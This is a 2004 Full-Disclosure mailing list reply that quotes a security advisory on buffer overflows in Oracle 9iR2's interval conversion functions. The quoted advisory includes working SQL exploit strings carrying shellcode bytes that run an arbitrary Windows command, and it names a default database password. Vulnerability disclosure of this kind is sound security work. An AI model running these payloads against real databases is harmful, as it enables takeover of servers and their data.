Re: [Full-Disclosure] Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow

From: Chris Anley (chris_at_ngssoftware.com)
Date: 02/05/04

  • Next message: Ron DuFresne: "Re: [Full-Disclosure] Interesting side effect of the new IE patch"
    To: Cesar <cesarc56@yahoo.com>
    Date: Thu, 5 Feb 2004 13:29:45 -0800 (Pacific Standard Time)
    
    

    Hey Cesar.

    These are known bugs.

    We (NGS) found and reported them last year. As you say, Oracle has
    already fixed them and released a patch. Check out

    http://www.nextgenss.com/research.html

    ...where we posted advisories on these bugs in December, along with
    another couple in from_tz and time_zone. We've historically found a lot
    of issues in Oracle, so if you want to eliminate the stuff that's already
    fixed from your list of 60+ issues it's a good place to look; the fine
    detail isn't always available in the Oracle alerts.

         -chris.

    On Thu, 5 Feb 2004, Cesar wrote:

    > Security Advisory
    >
    > Name: Oracle Database 9ir2 Interval Conversion
    > Functions Buffer Overflow.
    > System Affected : Oracle Database 9ir2, previous
    > versions could be affected too.
    > Severity : High
    > Remote exploitable : Yes
    > Author: Cesar Cerrudo.
    > Date: 02/05/04
    > Advisory Number: CC020401
    >
    >
    > Legal Notice:
    >
    > This Advisory is Copyright (c) 2003 Cesar Cerrudo.
    > You may distribute it unmodified and for free. You may
    > NOT modify it and distribute it or distribute
    > parts of it without the author's written permission.
    > You may NOT use it for commercial intentions
    > (this means include it in vulnerabilities databases,
    > vulnerabilities scanners, any paid service,
    > etc.) without the author's written permission. You are
    > free to use Oracle details for commercial intentions.
    >
    >
    > Disclaimer:
    >
    > The information in this advisory is believed to be
    > true though it may be false.
    > The opinions expressed in this advisory are my own and
    > not of any company. The usual standard
    > disclaimer applies, especially the fact that Cesar
    > Cerrudo is not liable for any damages caused
    > by direct or indirect use of the information or
    > functionality provided by this advisory.
    > Cesar Cerrudo bears no responsibility for content or
    > misuse of this advisory or any derivatives thereof.
    >
    >
    >
    > !!!!!!!!!!!ALERT!!!!!!!!!!!:
    >
    > Oracle was contacted about these vulnerabilities, but
    > their Security Response Team is one of the worst that
    > i have deal with, they don't care about security and
    > they don't even follow OISafety rules(Oracle is a
    > member).
    > Because this reason we only have told to Oracle about
    > just a couple of bugs, i think i won't contact them
    > anymore,
    > or maybe if i get a letter from Larry Ellison asking
    > for apologies...:).
    > Anyways if Oracle would spend more money on security
    > than in marketing saying that their products are
    > unbreakable
    > everything would be different. Right now Oracle
    > database server and other Oracle products are some
    > kind of backdoor.
    > These vulnerabilities are just only a bit of +60 that
    > we have identified (yes more than 60 issues and
    > most of these issues can be exploited by any low
    > privileged user to take complete control over the
    > database and probably OS, also for some of them there
    > aren't any workarounds). If you are running Oracle i
    > recomend you to start praying to not being hacked and
    > to start complaining to Oracle to improve the quality
    > of
    > their products and to release patches.
    >
    > BTW: if someone from Oracle dares to say that i'm not
    > telling the true, then probably i will release all the
    > holes
    > information to shut their mouths.
    >
    > Some workaround to protect your Oracle servers until
    > maybe next year when Oracle probably could fix their
    > buggy
    > database server:
    >
    > -Check packages permissions and remove public
    > permission, set minimal permissions
    > that fit your needs.
    > -Check Directory Objects permissions and remove public
    > permission, set minimal permissions
    > that fit your need, remove Directory Objecs if not
    > used.
    > -Restrict users to execute directly PL/SQL statements
    > over the server.
    > -Periodically audit users permissions on all database
    > objects.
    > -Lock users that aren't used.
    > -Change default passwords.
    > If you want automation, i really like AppDetective for
    > Oracle:
    > http://www.appsecinc.com/products/appdetective/oracle/
    >
    >
    > Overview:
    >
    > Oracle Database Server is one of the most used
    > database servers in the world, it was marketed
    > as being unbreakable and many people thinks that is
    > one of the most secure database server in
    > the market. Larry Ellison (Oracle CEO) says that
    > Oracle is used by NSA, CIA, russian intelligence,
    > goverments, etc.
    > (www.commonwealthclub.org/archive/96/96-03ellison-qa.html),
    > so it must be really secure!!!
    > Oracle Database Server provides two functions that can
    > be used with PL/SQL to convert numbers
    > to date/time intervals, these functions have buffer
    > overflow vulnerebilities.
    >
    >
    >
    > Details:
    >
    > When any of these conversion funcions are called with
    > a long string as a second
    > parameter a buffer overflow occurs.
    >
    > To reproduce the overflow execute the next PL/SQL:
    >
    > SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
    >
    > SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;
    >
    >
    >
    > This vulnerability can be exploited by any Oracle
    > Database user because access to these
    > functions can't be restricted.
    > Explotation of this vulnerability allow an attacker to
    > execute arbitrary code, also it
    > can be exploited to cause DOS (Denial of service)
    > killing Oracle server process. An attacker can
    > complete compromise the OS and database if Oracle is
    > running on Windows plataform, because Oracle must
    > run under the local System account or under an
    > administrative account. If Oracle is running on *nix
    > then only the database could be compromised because
    > Oracle runs mostly under oracle user which has
    > restricted
    > permissions.
    > Important!: Explotation of these vulnerabilities
    > becomes easy if Oracle Internet Directory has
    > been deployed, because Oracle Internet Directory
    > creates a database user called ODSCOMMON that
    > has a default password ODSCOMMON (Unbreakable???,
    > hahaha, please take a look at this
    >
    > http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html),
    > this password can not be changed,
    > so any attacker can use this user to connect to
    > database and exploit these vunerabilities.
    >
    >
    > Full tests on Oracle database 9ir2 under Microsoft
    > Windows 2000 Server and Linux confirm these
    > vulnerabilities,
    > versions running in other OS plataforms are believed
    > to be affected too.
    > Previous Oracle Database Server versions could be
    > affected by these vulnerabilities.
    >
    >
    >
    > Exploits:
    >
    > --these exploits should work on W2K Server and WinXp,
    > not tested on Win2003.
    > --run any command at the end of the string
    > SELECT
    > NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
    > ||
    >
    > chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
    >
    > 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
    > ARE YOU SURE? >c:\Unbreakable.txt')
    >
    > FROM DUAL;
    >
    > SELECT
    > NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
    > ||
    >
    > chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
    >
    > 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
    > ARE YOU SURE? >c:\Unbreakable.txt')
    >
    > FROM DUAL;
    >
    >
    >
    > Vendor Fix:
    >
    > Go to Oracle Metalink site, http://metalink.oracle.com
    >
    >
    > Vendor Contact:
    >
    > Oracle was contacted and they released a fix without
    > telling me nor the public anything and without issuing
    > an alert.
    >
    >
    >
    >
    > __________________________________
    > Do you Yahoo!?
    > Yahoo! Finance: Get your refund fast by filing online.
    > http://taxes.yahoo.com/filing.html
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html
    >
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Ron DuFresne: "Re: [Full-Disclosure] Interesting side effect of the new IE patch"